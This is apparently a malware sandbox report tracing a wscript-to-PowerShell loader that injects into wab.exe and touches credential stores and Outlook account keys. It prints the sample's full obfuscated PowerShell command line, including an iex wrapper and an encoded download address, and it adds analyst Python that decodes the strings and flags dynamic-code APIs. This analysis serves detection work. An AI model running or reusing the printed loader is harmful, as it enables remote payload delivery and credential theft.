                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: version.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: pstorec.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: pstorec.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior

Data Obfuscation

Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: .Run("powershell "cls;write 'Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trom", "0")
Source: Yara match | File source: 0000000A.00000002.3365707907.0000000003B66000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2523450659.00000000098C6000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2523348220.0000000008E50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2647803463.000002849CCDF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2517695636.00000000063C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String($Trommesalsmaleri)$global:Journalnummeret = [System.Text.Encoding]::ASCII.GetString($Spuming)$global:Gennemsigtigt=$Journalnummeret.substring($Lysimeters,$Descantist115)<#beagler Mids
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: GetDelegateForFunctionPointer((bunkevist $Camperingers $Premoral), (Enveloping @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Hellebardists = [AppDomain]::CurrentDomain.GetAssemblies()$
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Konfedereret)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Peroxy, $false).DefineType($Telecourse, $Aca
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String($Trommesalsmaleri)$global:Journalnummeret = [System.Text.Encoding]::ASCII.GetString($Spuming)$global:Gennemsigtigt=$Journalnummeret.substring($Lysimeters,$Descantist115)<#beagler Mids
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens';If (${host}.CurrentCulture) {$Fightet++;}Function fyrstendmme($aldersforskellens){$Breddesekunder=$aldersforskellens.Length-$Fightet;$Energi='SUBsTRI';$Energi+='ng';For( $standsforskellenes=7;$standsforskellenes -lt $Breddesekunder;$standsforskellenes+=8){$Unblessed+=$aldersforskellens.$Energi.Invoke( $standsforskellenes, $Fightet);}$Unblessed;}function Illish($Phagedaena){ . ($Triangularize) ($Phagedaena);}$Opholdsstuernes=fyrstendmme 'Ove,logMP sternoStudentzB,throdiBasommal,ovangslCopywria rbefol/Aphidic5Blokskr.Overvaa0Duarchy Genrefo(Reser,eWDistrusiOsm.regnSpacersdcert,fioPassiarwInterjesPeckedi NydeligNMontr cTAnticle Medinde1 Overcr0elastom.Un.erfo0Renounc; Topot. Bia ricWTrimniniJetsrunnLsdelfl6Hovmodi4forrykk;Nautica stra hsxSne ker6Cohea.t4 theop.; Prster SelvcerEntase v Undres:undecor1Fejlber2Phyllos1Martial.Konkurr0Fdevand)Yawlers AbioloGFemkroneVejrm.lckommandkBemyndio Ti skr/Vaaben.2 Relati0 Fanwr 1Flugtni0Gerning0Analyse1Udmanvr0Sidetal1Lin.les Appo,ehFCyk lbaiSamekhurcalioloeMoa lesfRester o,estselxUdsp ng/ Aandev1 asiali2Tubercl1,eperso. 
drydde0 Fogf,u ';$Sorteringens=fyrstendmme 'PaakrveU Antedas Sjaelaevulkankr baga e-tjenestA.nderprgMemoryleTelak cn ndtjentDesinfi ';$Bespake=fyrstendmme 'Arthrozh Lat,setLaveslat GenbrupUdnvnel:Donnish/Telefon/Gambesm1Esquire0Aktiesm3Nonrepa. Pushie2Spag um3 Entome7Simonio. digame8 cul ee6 Mistan. Ba oni2Sawneba4porella7Rodesbl/ ClenchF BoatsirOpprioreGraagaamAndenklmBetonk,eSexol glBoghvediAf.rftegAdipsybs calceit GeodifeUlcerog.ElectroxApp,ehesAf,rydsnholden ';$Deutoxide=fyrstendmme 'Valgets>Bakteri ';$Triangularize=fyrstendmme 'UdfyldniMikalaseUforkorxReprodu ';$Doozie='Medansvaret';$Bombestoppets = fyrstendmme ' ,ulbrieUl,triccUngr.sphForretnoAfrett. Pa.gene%Becifreainex,repRuelsenpCostaladCarabaoaalk,nettPja,tesaFleshbr%tidtag.\ NonmitDSystemko Lnra,mbEkstraibScraggleBudgettlparadeftCraniomrSrsynetuThiokoldClericieSecondin Do torsHamalds1Avgusta4Hildebo0A bejds.hugtandASkoleinfUnreal.fSerpent trillin&Hilsene&B ngtow P.cocureInterfrctubi,olhArtiumsoc onebr .ustulatunmetap ';Illish (fyrstendmme ' Pixm.p$GastroegTypot kl etreado Trachob Pse.doa hrynidl La.dsd:ForsnknDMimicaleAndalusb mirska,osmolat HalefieStandtirDidrach= Nati.n(Genaabnc Derre.mSteer
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens';If (${host}.CurrentCulture) {$Fightet++;}Function fyrstendmme($aldersforskellens){$Breddesekunder=$aldersforskellens.Length-$Fightet;$Energi='SUBsTRI';$Energi+='ng';For( $standsforskellenes=7;$standsforskellenes -lt $Breddesekunder;$standsforskellenes+=8){$Unblessed+=$aldersforskellens.$Energi.Invoke( $standsforskellenes, $Fightet);}$Unblessed;}function Illish($Phagedaena){ . ($Triangularize) ($Phagedaena);}$Opholdsstuernes=fyrstendmme 'Ove,logMP sternoStudentzB,throdiBasommal,ovangslCopywria rbefol/Aphidic5Blokskr.Overvaa0Duarchy Genrefo(Reser,eWDistrusiOsm.regnSpacersdcert,fioPassiarwInterjesPeckedi NydeligNMontr cTAnticle Medinde1 Overcr0elastom.Un.erfo0Renounc; Topot. Bia ricWTrimniniJetsrunnLsdelfl6Hovmodi4forrykk;Nautica stra hsxSne ker6Cohea.t4 theop.; Prster SelvcerEntase v Undres:undecor1Fejlber2Phyllos1Martial.Konkurr0Fdevand)Yawlers AbioloGFemkroneVejrm.lckommandkBemyndio Ti skr/Vaaben.2 Relati0 Fanwr 1Flugtni0Gerning0Analyse1Udmanvr0Sidetal1Lin.les Appo,ehFCyk lbaiSamekhurcalioloeMoa lesfRester o,estselxUdsp ng/ Aandev1 asiali2Tubercl1,eperso. 
drydde0 Fogf,u ';$Sorteringens=fyrstendmme 'PaakrveU Antedas Sjaelaevulkankr baga e-tjenestA.nderprgMemoryleTelak cn ndtjentDesinfi ';$Bespake=fyrstendmme 'Arthrozh Lat,setLaveslat GenbrupUdnvnel:Donnish/Telefon/Gambesm1Esquire0Aktiesm3Nonrepa. Pushie2Spag um3 Entome7Simonio. digame8 cul ee6 Mistan. Ba oni2Sawneba4porella7Rodesbl/ ClenchF BoatsirOpprioreGraagaamAndenklmBetonk,eSexol glBoghvediAf.rftegAdipsybs calceit GeodifeUlcerog.ElectroxApp,ehesAf,rydsnholden ';$Deutoxide=fyrstendmme 'Valgets>Bakteri ';$Triangularize=fyrstendmme 'UdfyldniMikalaseUforkorxReprodu ';$Doozie='Medansvaret';$Bombestoppets = fyrstendmme ' ,ulbrieUl,triccUngr.sphForretnoAfrett. Pa.gene%Becifreainex,repRuelsenpCostaladCarabaoaalk,nettPja,tesaFleshbr%tidtag.\ NonmitDSystemko Lnra,mbEkstraibScraggleBudgettlparadeftCraniomrSrsynetuThiokoldClericieSecondin Do torsHamalds1Avgusta4Hildebo0A bejds.hugtandASkoleinfUnreal.fSerpent trillin&Hilsene&B ngtow P.cocureInterfrctubi,olhArtiumsoc onebr .ustulatunmetap ';Illish (fyrstendmme ' Pixm.p$GastroegTypot kl etreado Trachob Pse.doa hrynidl La.dsd:ForsnknDMimicaleAndalusb mirska,osmolat HalefieStandtirDidrach= Nati.n(Genaabnc Derre.mSteer
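The process-creation rows above contain the whole string-decoding helper the loader relies on. `fyrstendmme` takes a string padded with Danish and English filler words and keeps one character out of every eight, starting at index 7: `$Fightet` is `$null` until `If (${host}.CurrentCulture) {$Fightet++;}` makes it 1 (CurrentCulture is always populated on a real host, so this is effectively a constant), the loop bound is `Length - 1`, and each iteration appends `SubString($i, 1)`. The result is fed to `Illish`, which dot-sources whatever `$Triangularize` decodes to. The Python below is analyst tooling added for this page, not code from the sample or from Joe Sandbox; it ports the helper, pulls every `$Var = fyrstendmme '...'` assignment out of a captured command line, and flags the dynamic-code-loading APIs that the AMSI rows show in the later stage. The three assignments it decodes are copied from this report; longer strings on the rendered page (the function name itself is shown as "fyrstendmme", which suggests non-ASCII characters were dropped during rendering) may not realign, so run the decoder against the original script rather than the report text for those.

```python
"""Decoder for the fyrstendmme string obfuscation seen in this report's PowerShell stage.

Port of the sample's helper (variable names from the captured command line):
    $Fightet++                                   # $null -> 1: one character per group
    $Breddesekunder = $s.Length - $Fightet
    For ($i = 7; $i -lt $Breddesekunder; $i += 8) { $out += $s.SubString($i, $Fightet) }
"""
import re

# Assignments copied verbatim from the wscript -> powershell command line in this report.
SAMPLE_CALLS = (
    "$Sorteringens=fyrstendmme 'PaakrveU Antedas Sjaelaevulkankr baga e-tjenestA.nderprgMemoryleTelak cn ndtjentDesinfi ';"
    "$Deutoxide=fyrstendmme 'Valgets>Bakteri ';"
    "$Triangularize=fyrstendmme 'UdfyldniMikalaseUforkorxReprodu ';"
)

# AMSI-captured fragments copied from this report (already truncated by the sandbox).
SAMPLE_AMSI_LINES = (
    "FromBase64String($Trommesalsmaleri)$global:Journalnummeret = [System.Text.Encoding]::ASCII.GetString($Spuming)",
    "GetDelegateForFunctionPointer((bunkevist $Camperingers $Premoral), (Enveloping @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))",
    "DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Konfedereret)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Peroxy, $false)",
)

# .NET APIs that, together, let a script resolve and call native code without Add-Type.
DYNAMIC_CODE_MARKERS = (
    "FromBase64String",
    "GetDelegateForFunctionPointer",
    "DefineDynamicAssembly",
    "DefineDynamicModule",
)


def pick_every_nth(obfuscated: str, offset: int = 7, step: int = 8, width: int = 1) -> str:
    """Port of fyrstendmme: SubString(i, width) for i = offset, offset+step, ... while i < len - width."""
    limit = len(obfuscated) - width
    return "".join(obfuscated[i:i + width] for i in range(offset, limit, step))


def decode_assignments(script: str, helper: str = "fyrstendmme") -> dict:
    """Map each `$Var = helper '...'` assignment in a command line to its decoded plaintext."""
    pattern = re.compile(r"\$(?P<var>\w+)\s*=\s*" + re.escape(helper) + r"\s+'(?P<arg>[^']*)'")
    return {m.group("var"): pick_every_nth(m.group("arg")) for m in pattern.finditer(script)}


def inline_decoded(script: str, helper: str = "fyrstendmme") -> str:
    """Rewrite the script with every helper call replaced by its decoded literal, for reading."""
    pattern = re.compile(re.escape(helper) + r"\s+'(?P<arg>[^']*)'")
    return pattern.sub(lambda m: "'" + pick_every_nth(m.group("arg")).replace("'", "''") + "'", script)


def dynamic_code_markers(amsi_content: str) -> list:
    """Return the dynamic-code-loading API names present in one AMSI / script-block line."""
    return [marker for marker in DYNAMIC_CODE_MARKERS if marker in amsi_content]


if __name__ == "__main__":
    for var, value in decode_assignments(SAMPLE_CALLS).items():
        print(f"${var} = {value!r}")
    print(inline_decoded(SAMPLE_CALLS))
    for line in SAMPLE_AMSI_LINES:
        print(dynamic_code_markers(line), line[:60])
```

Decoding the three captured assignments gives `$Triangularize = 'iex'` (so `Illish` is `. iex <arg>`, an Invoke-Expression wrapper), `$Sorteringens = 'User-Agent'` and `$Deutoxide = '>'`, which is the shape of a download-then-redirect-to-file stage rather than anything the visible command line states outright. The delegate built in the AMSI row, `(IntPtr, UInt32, UInt32, UInt32) -> IntPtr`, has the prototype of VirtualAlloc; the report does not name the resolved export, so treat that identification as an inference when writing detections.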
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW, 14_2_004044A4
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD346F0943 push E95AFFD0h; ret 2_2_00007FFD346F09C9
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD346F09F3 push E95AFFD0h; ret 2_2_00007FFD346F09C9
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD347C54AD push ebp; iretd 2_2_00007FFD347C5538
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_04EAEC78 pushfd ; retf 5_2_04EAEC79
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07BE21A8 push eax; mov dword ptr [esp], ecx 5_2_07BE21B4
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07BE1FC8 push eax; mov dword ptr [esp], ecx 5_2_07BE21B4
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_097D6D41 push 00000012h; iretd 5_2_097D6D4F
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_097DCBD5 push eax; iretd 5_2_097DCBDA
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_21362806 push ecx; ret 10_2_21362819
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_21371219 push esp; iretd 10_2_2137121A
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_03A7CBD5 push eax; iretd 10_2_03A7CBDA
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_03A76D41 push 00000012h; iretd 10_2_03A76D4F
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_0044693D push ecx; ret 14_2_0044694D
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_0044DB70 push eax; ret 14_2_0044DB84
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_0044DB70 push eax; ret 14_2_0044DBAC
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_00451D54 push eax; ret 14_2_00451D61
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_0044B090 push eax; ret 15_2_0044B0A4
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_0044B090 push eax; ret 15_2_0044B0CC
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_00451D34 push eax; ret 15_2_00451D41
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_00444E71 push ecx; ret 15_2_00444E81
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00414060 push eax; ret 16_2_00414074
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00414060 push eax; ret 16_2_0041409C
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00414039 push ecx; ret 16_2_00414049
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_004164EB push 0000006Ah; retf 16_2_004165C4
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00416553 push 0000006Ah; retf 16_2_004165C4
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00416555 push 0000006Ah; retf 16_2_004165C4
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 15_2_004047CB
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
